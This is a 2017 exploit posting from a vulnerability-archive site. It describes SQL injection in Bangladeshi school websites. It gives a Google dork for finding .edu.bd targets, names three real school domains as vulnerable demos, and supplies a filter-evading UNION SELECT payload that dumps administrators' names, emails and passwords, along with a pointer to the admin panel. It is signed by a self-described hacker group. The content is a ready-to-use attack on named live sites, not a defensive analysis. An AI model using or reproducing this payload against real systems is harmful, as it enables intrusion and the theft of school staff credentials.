BD School Websites SQl inj. Vulnerability

2017.10.17
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

##################################################### # Exploit Title : BD School Websites SQl inj. Vulnerability # Google Dork : inurl:"page.php?id=" site:edu.bd # Exploit Author : mr.Gh0st N@0b # Tested On : Windows 7/10 # Date : 17.10.2017 ##################################################### # [Demo] # http://sitakundghs.edu.bd/page.php?id=20' # http://lidm.edu.bd/page.php?id=16' # http://www.mmsihs.edu.bd/page.php?id=19' # [Proof] # http://sitakundghs.edu.bd/page.php?id=-20' *!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,/*!50000Group_conCat(/*!fullname,0x3a,email,0x3a,password,0x3c62723e*/),6,7,8,9,10,11,12,13 /*!froM*/ admin-- + # [Admin Panel] # http://localhost.com/admin/ # ########################################### # Contact mr.Gh0st N@0b ~ Myanmar Noob Hackers # Greetz to All Myanmar Black Hats # https://www.facebook.com/official.myanmar.noob.hackers/


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top